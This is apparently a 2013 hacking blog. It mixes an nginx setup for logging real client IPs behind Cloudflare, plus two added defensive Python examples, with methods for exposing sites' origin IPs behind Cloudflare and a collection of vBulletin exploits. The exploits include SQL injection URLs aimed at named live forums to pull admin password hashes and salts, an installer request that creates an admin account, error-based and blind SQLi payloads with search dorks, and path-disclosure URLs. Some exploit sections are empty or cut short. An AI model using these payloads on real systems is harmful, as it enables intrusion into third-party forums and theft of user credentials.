Saturday 28 December 2013

How to get the real IP connecting to your server when you use Cloudflare

The problem: when your server sits behind Cloudflare, the IP that connects to your server is Cloudflare's IP, and your logs record Cloudflare's IP as well. To log the real user's address, do the following.
If you use nginx, edit nginx.conf in the http section as follows:
http {
    set_real_ip_from   204.93.240.0/24;
    set_real_ip_from   204.93.177.0/24;
    set_real_ip_from   199.27.128.0/21;
    set_real_ip_from   173.245.48.0/20;
    set_real_ip_from   103.22.200.0/22;
    set_real_ip_from   141.101.64.0/18;
    set_real_ip_from   108.162.192.0/18;
    real_ip_header     CF-Connecting-IP;
    # ... the rest of the http section ...
}

If Varnish sits in front of nginx, make the same change and also add the IP 127.0.0.1 to the list above:

http {
    set_real_ip_from   204.93.240.0/24;
    set_real_ip_from   204.93.177.0/24;
    set_real_ip_from   199.27.128.0/21;
    set_real_ip_from   173.245.48.0/20;
    set_real_ip_from   103.22.200.0/22;
    set_real_ip_from   141.101.64.0/18;
    set_real_ip_from   108.162.192.0/18;
    set_real_ip_from   127.0.0.1/32;
    real_ip_header     CF-Connecting-IP;
    # ... the rest of the http section ...
}

Where do the IPs above come from? Easy: go to http://cloudflare.com/ips, which lists nearly all of Cloudflare's IPs. Of course it is not complete, because I have checked.
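
What `set_real_ip_from` and `real_ip_header` do together, modelled in Python as an added example (not nginx's code and not from the original post): the header is honoured only when the TCP peer lies inside a trusted range. The sample addresses are constructed, and falling back to the peer address on an unparsable header is this sketch's choice. The last case shows that once 127.0.0.1 is trusted for Varnish, nginx accepts whatever header Varnish forwards, so Varnish itself must only be reachable from Cloudflare.

```python
import ipaddress

# Ranges copied from the nginx.conf on this page (a 2013 snapshot).
CLOUDFLARE_RANGES = [
    "204.93.240.0/24", "204.93.177.0/24", "199.27.128.0/21",
    "173.245.48.0/20", "103.22.200.0/22", "141.101.64.0/18",
    "108.162.192.0/18",
]

def build_trusted(cidrs):
    """Parse the set_real_ip_from entries into network objects."""
    return [ipaddress.ip_network(c) for c in cidrs]

def resolve_client_ip(peer_ip, headers, trusted, header="CF-Connecting-IP"):
    """Return the address to log: the header value only if the peer is trusted."""
    peer = ipaddress.ip_address(peer_ip)
    if not any(peer in net for net in trusted):
        return str(peer)              # untrusted sender: ignore the header
    value = headers.get(header, "").strip()
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        return str(peer)              # missing or malformed header

def demo():
    direct = build_trusted(CLOUDFLARE_RANGES)
    behind_varnish = build_trusted(CLOUDFLARE_RANGES + ["127.0.0.1/32"])
    forged = {"CF-Connecting-IP": "198.51.100.7"}   # constructed header
    return {
        # Request really relayed by a Cloudflare edge: header is used.
        "via_cloudflare": resolve_client_ip(
            "173.245.48.10", {"CF-Connecting-IP": "203.0.113.5"}, direct),
        # Client hits the origin directly with a forged header: ignored.
        "direct_forged": resolve_client_ip("192.0.2.44", forged, direct),
        # Trusted peer but garbage header: keep the peer address.
        "bad_header": resolve_client_ip(
            "141.101.64.9", {"CF-Connecting-IP": "not-an-ip"}, direct),
        # nginx behind Varnish: the peer is always loopback, so the header
        # is always believed, whoever actually connected to Varnish.
        "varnish_local": resolve_client_ip("127.0.0.1", forged, behind_varnish),
    }

if __name__ == "__main__":
    for case, logged in demo().items():
        print(f"{case:15} -> {logged}")
```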

Bypass cloudflare

Method 1: Check the domain's history. Use this site:
http://toolbar.netcraft.com/site_report?url=DOMAIN.COM

Method 2: Brute-force DNS using nmap

# nmap -sV -sS -F <target>                 # check services
# nmap --script dns-brute -sn <target>     # now brute-force
http://www.youtube.com/watch?v=IsWFE2GaQnk

Method 3: Check online (ping subdomains and server services).

http://network-tools.com
http://www.cloudflare-watch.com/cfs.html
http://iphostinfo.com/cloudflare/antiwhitehat.com
http://exonapps.nl/cfresolver/
http://www.vlvc.edu.vn/mail/cloud.php

It checks services online, such as:
mail.antiwhitehat.com             No DNS record
direct.antiwhitehat.com           50.23.64.17
direct-connect.antiwhitehat.com   No DNS record
cpanel.antiwhitehat.com           50.23.64.17
ftp.antiwhitehat.com              50.23.64.17
admin.antiwhitehat.com            No DNS record
pop.antiwhitehat.com              50.23.64.17
imap.antiwhitehat.com             No DNS record
webmail.antiwhitehat.com          50.23.64.17
forum.hantiwhitehat.com           No DNS record
admin.antiwhitehat.com            No DNS record
beta.antiwhitehat.com             No DNS record
portal.antiwhitehat.com           No DNS record


Method 4: Bypass using Fierce on BackTrack

Go to the path: /pentest/enumeration/dns/fierce/
and run
./fierce.pl -dns domain.com

Method 5: Use some tools. Mind you, I don't know whether these tools are backdoored.
Watch and download here: http://www.youtube.com/watch?v=08fnIFf6GVQ
...A few more methods will be added later.


Monday 21 October 2013

vBulletin ChangUonDyU



This is an old bug; I am writing it up again for anyone who doesn't know it yet.
http://www.mediafire.com/?rsbbczaf00abqtf

You can see more victims below:
http://www.bacgiangonline.net/diendan/ajax.php?do=allforum&result=20

Forum teen Tỉnh Bắc Giang :http://www.bacgiangonline.net/diendan/ajax.php?do=inforum&listforumid=-20)+/*!50000unION*/+/*!50000seLECT*/+1,2,3,4,5,concat_ws(0x2f,userid,password,salt),7,8,9,10 from user where userid =1-- -&result=20









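
The request pattern in the URLs above (`ajax.php?do=inforum` with SQL in `listforumid`, keywords wrapped in MySQL versioned comments such as `/*!50000unION*/`) can be caught in web-server access logs. The following Python log check is an added example, not code from the original post; the log lines are constructed, and the rule that a legitimate `listforumid` is a comma-separated list of integers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; hosts, paths and addresses are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Oct/2013:10:00:01 +0700] '
    '"GET /forum/ajax.php?do=inforum&listforumid=2,5,9&result=20 HTTP/1.1" 200 512',
    '198.51.100.7 - - [21/Oct/2013:10:00:09 +0700] '
    '"GET /forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/'
    '+/*!50000seLECT*/+1,2,3--%20-&result=20 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [21/Oct/2013:10:00:12 +0700] "GET /forum/index.php HTTP/1.1" 200 9000',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate listforumid is a comma-separated list of integers.
ID_LIST_RE = re.compile(r'^\d+(?:,\d+)*$')
# "/*!50000unION*/" glues the keyword to digits, so \bunion\b alone misses it;
# match the versioned-comment opener as well.
SQL_HINT_RE = re.compile(r'/\*!|\b(?:union|select|concat_ws)\b', re.I)

def naive_union_match(value):
    """The word-boundary rule a simple keyword filter might use."""
    return re.search(r'\bunion\b', value, re.I) is not None

def inspect_line(line):
    """Return (client, reason, decoded_value) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.endswith("/ajax.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # URL-decodes values
    if "inforum" not in params.get("do", []):
        return None
    for value in params.get("listforumid", []):
        if not ID_LIST_RE.match(value):
            reason = "sql-keywords" if SQL_HINT_RE.search(value) else "non-numeric"
            return (client, reason, value)
    return None

def scan(lines):
    """Inspect every log line and keep only the suspicious requests."""
    return [hit for hit in map(inspect_line, lines) if hit]

if __name__ == "__main__":
    for client, reason, value in scan(SAMPLE_LOG):
        print(client, reason, repr(value))
```

The same integer-list check belongs in the application itself, in front of the query, so that a non-numeric `listforumid` is rejected rather than only logged.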

exploit vbb upgrade.php 0day

http://www.youtube.com/watch?v=LF05iUB6Cf0&list=SPF6T3E4DLjOT9PpTwkuTONYR-kHc-CeI6

URL :
http://localhost:8080/vbb4/install/install.php
http://localhost:8080/vbb4/install/upgrade.php
DATA :
ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0&only=false&customerid=&response=yes&htmlsubmit=1&htmldata[username]=yoyo&htmldata[password]=123456&htmldata[confirmpassword]=123456&htmldata[email]=admin@admin.com&

SQL VBB 5.0.0

) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

http://www.youtube.com/watch?v=CMWUtv3bwcQ&list=SPF6T3E4DLjOT9PpTwkuTONYR-kHc-CeI6

Tuesday 21 May 2013

SQL vbulletin 5.x and Perl code

#Title: vBulletin 5 SQL Injection > Beta Whatever
#Author: 0x0A
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Software Link: http://www.vbulletin.com/purchases/
http://www.vbulletin.com/features/
#Version: 5 and above(not older versions)
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
#Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
#Demo sites to try: http://www.sultantheme.com/vb5connectforum/
http://vb5connect.com/bb/

How to manually inject :
-------------------------------------------------------------------
[#1] First of all, make an account to the vBulletin 5 forum,
-------------------------------------------------------------------


--------------------------------------------------------------------

Wednesday 15 May 2013

Vbulletin MOD all


c0d3_z3r0/vBulletin vbBux/vbPlaza Blind SQL Injection 


--==+======================================================================================================================+==--
--==+                  vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability                +==--
--==+======================================================================================================================+==--
AUTHOR: Cold z3ro & Crck_Man
SITE: www.vbPlaza.com
DORK: inurl:"vbplaza.php?do=*"
DESCRIPTION: Blind SQL Injection in name of vbplaza.php a mod for vBulletin, able to retrieve admin hash
EXPLOIT:
http://www.site.com/forum/vbplaza.php?do=item&name=bank'/**/and 58<ascii(substring((SELECT concat(password,0x3a,username) from user limit 0,1),33,1))/*
IE: ascii encodes
  58  => :
  48  => 0
  120 => x
NOTE: You'll need to be logged into the forum to exploit vbplaza.php. Increment the limit to get the next admin .
Copyrights : www.hackteach.org , www.h-t.cc
Greetz : www.hackteach.[org/net] , www.islam-attack.com , www.s3curi7y.com , www.xp10.biz , Friends


exploit vbulletin 4.1.9

# Full Path Disclosure:

http://localhost/path/forumdisplay.php?do[]=linc0ln.dll
http://localhost/path/calendar.php?do[]=linc0ln.dll
http://localhost/path/search.php?do[]=linc0ln.dll

vbulletin 4.1.12

vBulletin 4.1.12 SQL Injection


##########################################################################################
#
# Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability
#
# Author        : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home          : http://IrIsT.Ir/forum
#
# Software Link : http://www.Vbulletin.com/
#
# Security Risk : High
#
# Version       : All Version
#
# Tested on     : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork          : intext:"Powered By Vbulletin 4.1.12"
#
##########################################################################################
#
#  Expl0iTs :
#
#
##########################################################################################
#
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
#
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
#
# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
#
##########################################################################################